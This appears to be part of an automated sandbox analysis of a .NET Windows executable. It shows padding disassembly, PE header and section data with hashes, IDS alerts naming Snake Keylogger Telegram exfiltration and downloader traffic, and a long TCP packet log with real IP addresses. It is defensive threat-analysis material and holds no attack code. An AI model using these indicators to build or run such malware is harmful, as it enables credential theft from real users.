add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x615a0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x64000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5f5f4	0x5f600	a3ad8bd3aeaf61a0bacf9a3fabd2dcde	False	0.3987113982634338	data	5.5921409067303385	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0x598	0x600	b4cf16e3ac4a5cbaa3c02e73ecbadfdf	False	0.4153645833333333	data	4.051472710951915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x64000	0xc	0x200	a25839957ee60310588921530bf43ac9	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x620a0	0x30c	data			0.4282051282051282
RT_MANIFEST	0x623ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-05T11:04:51.122024+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49700	132.226.247.73	80	TCP
2024-11-05T11:04:52.512548+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49700	132.226.247.73	80	TCP
2024-11-05T11:04:53.218676+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49702	188.114.96.3	443	TCP
2024-11-05T11:04:54.153229+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49703	132.226.247.73	80	TCP
2024-11-05T11:04:56.512370+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49707	188.114.96.3	443	TCP
2024-11-05T11:04:59.778889+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49726	188.114.96.3	443	TCP
2024-11-05T11:05:01.451239+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49739	188.114.96.3	443	TCP
2024-11-05T11:05:02.740749+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.7	49738	TCP
2024-11-05T11:05:12.606399+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49795	132.226.247.73	80	TCP
2024-11-05T11:05:13.953308+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49795	132.226.247.73	80	TCP
2024-11-05T11:05:14.648390+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49823	188.114.96.3	443	TCP
2024-11-05T11:05:15.575162+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49828	132.226.247.73	80	TCP
2024-11-05T11:05:17.087746+0100	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49837	149.154.167.220	443	TCP
2024-11-05T11:05:17.215779+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49838	132.226.247.73	80	TCP
2024-11-05T11:05:31.172735+0100	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49922	149.154.167.220	443	TCP
2024-11-05T11:05:42.069210+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.7	49982	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 11:04:44.578330040 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:44.578380108 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:44.578445911 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:44.592139959 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:44.592174053 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:45.530920029 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:45.531061888 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:45.538898945 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:45.538913012 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:45.539259911 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:45.590696096 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.080838919 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.127329111 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.367168903 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.418768883 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.418793917 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.465673923 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.524816036 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.524828911 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.524867058 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.524888039 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.524895906 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.524943113 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.524969101 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.525011063 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.528131008 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.528145075 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.528162003 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.528172970 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.528220892 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.528244972 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.528261900 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.575042009 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.684022903 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.684036970 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.684082985 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.684113026 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.684178114 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.684209108 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.684237003 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.684248924 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.687645912 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.687654018 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.687678099 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.687732935 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.687752962 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.687771082 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.687789917 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.841303110 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.841326952 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.841398954 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.841429949 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.841485023 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.844989061 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.845005035 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.845093012 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.845118999 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.845164061 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.848069906 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.848088026 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.848182917 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.848207951 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.848253012 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.996861935 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.996884108 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.996937037 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.996958017 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:46.996973038 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:46.996999025 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.000843048 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.000859976 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.000926971 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.000941038 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.000971079 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.000983953 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.003715992 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.003732920 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.003781080 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.003787994 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.003830910 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.005976915 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.005994081 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.006037951 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.006047964 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.006079912 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.006133080 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.153386116 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.153412104 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.153562069 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.153583050 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.153634071 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.155713081 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.155730009 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.155792952 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.155801058 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.155847073 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.158113956 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.158132076 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.158175945 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.158183098 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.158211946 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.158226013 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.161689997 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.161706924 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.161765099 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.161777020 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.161818027 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.163368940 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.163384914 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.163459063 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.163469076 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.163512945 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.165637016 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.165652990 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.165707111 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.165716887 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.165757895 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.312488079 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.312515974 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.312603951 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.312633991 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.312681913 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.314450979 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.314471006 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.314529896 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.314542055 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.314578056 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.317220926 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.317269087 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.317312956 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.317322969 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.317343950 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.317361116 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.318979025 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.318994999 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.319046021 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.319055080 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.319099903 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.320908070 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.320923090 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.320976973 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.320985079 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.321019888 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.468811989 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.468842983 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.468893051 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.468919039 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.468974113 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.468974113 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.470504999 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.470525980 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.470578909 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.470587969 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.470630884 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.472934961 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.472954988 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.473017931 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.473026991 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.473069906 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.474680901 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.474698067 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.474757910 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.474766016 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.474805117 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.476293087 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.476310968 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.476349115 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.476356983 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.476376057 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.476727962 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.628981113 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.629008055 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.629070044 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.629091978 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.629106998 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.629143000 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.630604982 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.630623102 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.630669117 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.630676985 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.630716085 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.632394075 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.632416010 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.632468939 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.632476091 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.632508039 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.632524014 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.634069920 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.634085894 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.634140968 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.634160995 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.634196997 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.635796070 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.635812044 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.635868073 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.635890007 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.635929108 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.636538982 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.636554956 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.636615992 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.636624098 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.636663914 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.784049034 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.784069061 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.784126997 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.784145117 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.784179926 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.784204006 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.785619020 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.785634995 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.785685062 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.785697937 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.785715103 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.785731077 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.786593914 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.786608934 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.786653996 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.786660910 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.786685944 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.786712885 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.788997889 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.789011955 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.789076090 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.789082050 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.789108992 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.789130926 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.789900064 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.789913893 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.789968014 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.789975882 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.790008068 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.791538954 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.791560888 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.791608095 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.791615009 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.791640997 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.791661978 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.941725016 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.941752911 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.941822052 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.941850901 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.941895008 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.943022966 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.943046093 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.943104982 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.943114042 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.943159103 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.943897963 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.943916082 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.943955898 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.943963051 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.943993092 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.944005013 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.945339918 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.945355892 CET	443	49699	188.132.193.46	192.168.2.7
Nov 5, 2024 11:04:47.945409060 CET	49699	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:04:47.945416927 CET	443	49699	188.132.193.46	192.168.2.7
